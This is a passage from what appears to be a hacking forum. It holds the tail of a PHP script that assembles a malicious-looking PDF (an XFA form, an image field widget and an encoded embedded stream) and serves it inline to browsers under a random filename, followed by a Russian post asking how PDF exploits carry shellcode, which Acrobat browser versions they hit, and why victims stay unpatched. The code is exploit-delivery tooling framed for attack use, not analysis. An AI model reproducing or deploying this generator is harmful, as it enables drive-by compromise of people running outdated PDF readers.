/Filter [/ASCII85Decode/FlateDecode]/Type /EmbeddedFile>>".$Newline; //Experimental $PDF = $PDF."<</Filter /ASCII85Decode/FlateDecode/Length ".strlen($XML)."/Type /EmbeddedFile>>".$Newline; $PDF = $PDF."stream".$Newline; $PDF = $PDF.$XML.$Newline; $PDF = $PDF."endstream".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."2 0 obj".$Newline; $PDF = $PDF."<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."3 0 obj".$Newline; $PDF = $PDF."<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."4 0 obj".$Newline; $PDF = $PDF."<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."5 0 obj".$Newline; $PDF = $PDF."<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."6 0 obj".$Newline; $PDF = $PDF."<</Kids [5 0 R]/Type /Pages/Count 1>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."7 0 obj".$Newline; $PDF = $PDF."<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."8 0 obj".$Newline; $PDF = $PDF."<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>".$Newline; $PDF = $PDF."endobj xref".$Newline; $PDF = $PDF."trailer".$Newline; $PDF = $PDF."<</Root 7 0 R/Size 9>>".$Newline; $PDF = $PDF."startxref".$Newline; $PDF = $PDF."14765".$Newline; $PDF = $PDF."%%EOF"; return $PDF; } $Finished = Generate_PDF(); header("Accept-Ranges: bytes\r\n"); header("Content-Length: ".strlen($Finished)."\r\n"); header("Content-Disposition: inline; filename=".rand(1,9999).".pdf"); header("\r\n"); header("Content-Type: 
application/pdf\r\n\r\n"); echo $Finished; ?>
а как устроены pdf экспы... надо ещё подсоединить pdf с включённым в него шеллкодом? и, как я понял, он бьёт Adobe Acrobat, который поддерживает работу с браузерами. и с какой версии это работает? не во всех же версиях есть поддержка браузера. и, кстати, я плохо понимаю, почему юзеры не обновляют своё ПО. ведь оно обновляется автоматически... что, они все нажимают «отмена», когда начинается обновление? даже пиратская винда сама обновляется... включая IE, который тоже обновляется, но почему-то до сих пор остаются старые версии